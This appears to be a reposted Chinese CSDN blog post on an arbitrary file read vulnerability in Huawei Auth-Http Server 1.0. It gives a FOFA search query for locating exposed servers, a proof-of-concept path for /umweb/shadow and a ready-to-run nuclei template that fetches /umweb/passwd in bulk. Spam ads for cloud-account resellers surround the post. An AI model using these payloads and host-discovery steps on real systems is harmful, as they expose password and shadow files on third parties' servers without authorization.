华为Auth-Http Serve任意文件读取-CSDN博客

阿里云国内75折 回扣 微信号:monov8
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6

公众号掌控安全EDU 分享更多技术文章欢迎关注一起探讨学习

1.漏洞描述

华为Auth-Http Server 1.0任意文件读取攻击者可通过该漏洞读取任意文件。

2.网络资产查找

FOFAserver=”Huawei Auth-Http Server 1.0”

2、部分界面如下

3、Poc

/umweb/shadow

4、Poc批量验证

id: huanwei-auth-http-server-fileread

info:
name: 华为Auth-Http Server 1.0任意文件读取
author:
severity: medium
description: 华为Auth-Http Server 1.0任意文件读取攻击者可通过此漏洞获取敏感信息。

reference:
- https://
metadata:
fofa-query: server="Huawei Auth-Http Server 1.0"
verified: true
max-request: 1

http:
- raw:
- |
GET /umweb/passwd HTTP/1.1
Host: {{Hostname}}


matchers:
- type: dsl
dsl:
- 'status_code==200 && contains_all(body,"root")'

阿里云国内75折 回扣 微信号:monov8
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6
返回列表

上一篇:Docker常用命令-CSDN博客

下一篇:jenkins插件迁移-CSDN博客

“华为Auth-Http Serve任意文件读取-CSDN博客” 的相关文章

LeetCode刷题系列 -- 1080. 根到叶路径上的不足节点1年前 (2023-02-02)
JVM线上问题定位命令1年前 (2023-02-02)
【docker概念和实践 5】(1) 容器数据卷1年前 (2023-02-02)
ios网络协议从http变成https1年前 (2023-02-02)
单向循环链表1年前 (2023-02-02)
SOFAJRaft源码阅读-模块启动过程 1年前 (2023-02-02)
最好用的在线图片压缩工具——TinyPNG1年前 (2023-02-02)
支付宝接口的数字签名1年前 (2023-02-02)
最新版 Proteus 8.15 Professional 图文安装教程 [ 附安装包 ]1年前 (2023-02-02)
终于有人把区块链讲明白了1年前 (2023-02-02)

阿里云国际版